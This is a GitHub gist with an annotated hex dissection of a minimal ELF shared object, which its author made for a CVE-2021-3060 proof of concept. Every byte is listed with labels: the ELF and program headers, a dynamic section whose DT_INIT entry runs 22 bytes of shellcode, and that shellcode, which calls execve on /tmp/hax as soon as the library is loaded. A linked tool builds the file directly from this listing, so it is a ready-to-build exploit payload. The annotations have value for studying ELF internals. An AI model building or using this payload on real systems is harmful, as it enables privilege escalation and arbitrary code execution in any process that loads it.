Created
September 25, 2022 06:43
-
-
Save rqu1/5c20a376576cb567809c3cb4b54000e0 to your computer and use it in GitHub Desktop.
.xx formatted dissection of a tiny ELF I made for cve-2021-3060
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ╔═══════════════════════════════════════════════════════════════╗ | |
| ║ badlib.xx -- a tiny ELF shared object by rqu ║ | |
| ║ This will exec() /tmp/hax when dlopen()'d or loaded ║ | |
| ║ Originally released in binary form for my CVE-2021-3060 POC: ║ | |
| ║ https://gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756 ║ | |
| ║ build the binary with https://github.com/netspooky/xx ║ | |
| ╚═══════════════════════════════════════════════════════════════╝ | |
| ┌───────────┬───────────────────┬───────────────┬──────────────┬─────────────┐ | |
| │ Data │ ELF header │ PHDR │ Code │ Dynamic │ | |
| ├───────────┼───────────────────┼───────────────┼──────────────┼─────────────┤ | |
| ├ │ │ │ │ │ | |
| │ 0x00 -- ELF64 header (64 bytes) │ │ │ | |
| ├ │ │ │ │ │ | |
| 7f "ELF" ╞ ELF magic │ │ │ │ | |
| 02 ╞ 64-bit │ │ │ │ | |
| 01 ╞ little endian │ │ │ │ | |
| 01 ╞ ELF version 1 │ │ │ │ | |
| 00 ╞ system V ABI │ │ │ │ | |
| 0000 0000 ╒ padding │ │ │ │ | |
| 0000 0000 ╘ must be 0 │ │ │ │ | |
| 0300 ╞ e_type: DYN │ │ │ │ | |
| 3e00 ╞ e_machine: 62 │ │ │ │ | |
| 0100 0000 ╞ e_version: 1 │ │ │ │ | |
| ├ │ │ │ │ │ | |
| │ 0x18 -- PHDR #1 (56 bytes) │ │ │ │ | |
| ├ │ │ │ │ │ | |
| 0200 0000 │ ╞ PT_DYNAMIC │ │ │ | |
| 0600 0000 │ ╞ RW │ │ │ | |
| 1800 0000 ╒ e_phoff: 0x18 │ │ │ │ | |
| 0000 0000 ╘ │ │ │ │ | |
| 5800 0000 │ ╒ p_vaddr: 0x58 │ │ │ | |
| 0000 0000 │ ╘ │ │ │ | |
| "rqu (-" │ │ │ │ │ | |
| 3800 ╞ e_phentsize: 0x38 │ │ │ │ | |
| 0200 ╞ e_phnum: 2 │ │ │ │ | |
| ├ │ │ │ │ │ | |
| │ 0x3a -- code (22 bytes) │ │ │ │ | |
| ├ │ │ │ │ │ | |
| 31f6 │ │ ╞ xor eax, eax │ │ | |
| 56 │ │ ╞ push rsi │ │ | |
| 48bb 2f74 │ │ ╒ mov rbx, │ │ | |
| 6d70 2f68 │ │ │ "/tmp/hax" │ │ | |
| 6178 │ │ ╘ │ │ | |
| 53 │ │ ╞ push rbx │ │ | |
| 54 │ │ ╞ push rsp │ │ | |
| 5f │ │ ╞ pop rdi │ │ | |
| f7ee │ │ ╞ imul esi │ │ | |
| b03b │ │ ╞ mov al, 0x3b │ │ | |
| 0f05 │ │ ╞ syscall │ │ | |
| ├ │ │ │ │ │ | |
| │ 0x50 -- PHDR #2 (56 bytes) │ │ │ │ | |
| ├ │ │ │ │ │ | |
| 0100 0000 │ ╞ PT_LOAD │ │ │ | |
| 0700 0000 │ ╞ RWX │ │ │ | |
| ├ │ │ │ │ │ | |
| │ 0x58 -- DYNAMIC section (48 bytes) │ │ │ | |
| ├ │ │ │ │ │ | |
| 0500 0000 │ ╒ p_offset: 5 │ ╒ DT_STRTAB │ | |
| 0000 0000 │ ╘ │ ╘ │ | |
| 0500 0000 │ ╒ p_vaddr: 5 │ │ │ | |
| 0000 0000 │ ╘ │ │ │ | |
| │ │ │ │ │ | |
| 0c00 0000 │ │ │ ╒ DT_INIT │ | |
| 0000 0000 │ │ │ ╘ │ | |
| 3a00 0000 │ │ │ ╒ address of │ | |
| 0000 0000 │ │ │ ╘ code: 0x3a │ | |
| │ │ │ │ │ | |
| 0600 0000 │ │ │ ╒ DT_SYMTAB │ | |
| 0000 0000 │ │ │ ╘ │ | |
| 0000 0000 │ │ │ │ │ | |
| 0000 0000 │ │ │ │ │ | |
| ┌───────────┼───────────────────┼───────────────┼──────────────┼─────────────┤ | |
| │ Bytes │ ELF header │ PHDR │ Code │ Dynamic │ | |
| └───────────┴───────────────────┴───────────────┴──────────────┴─────────────┘ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment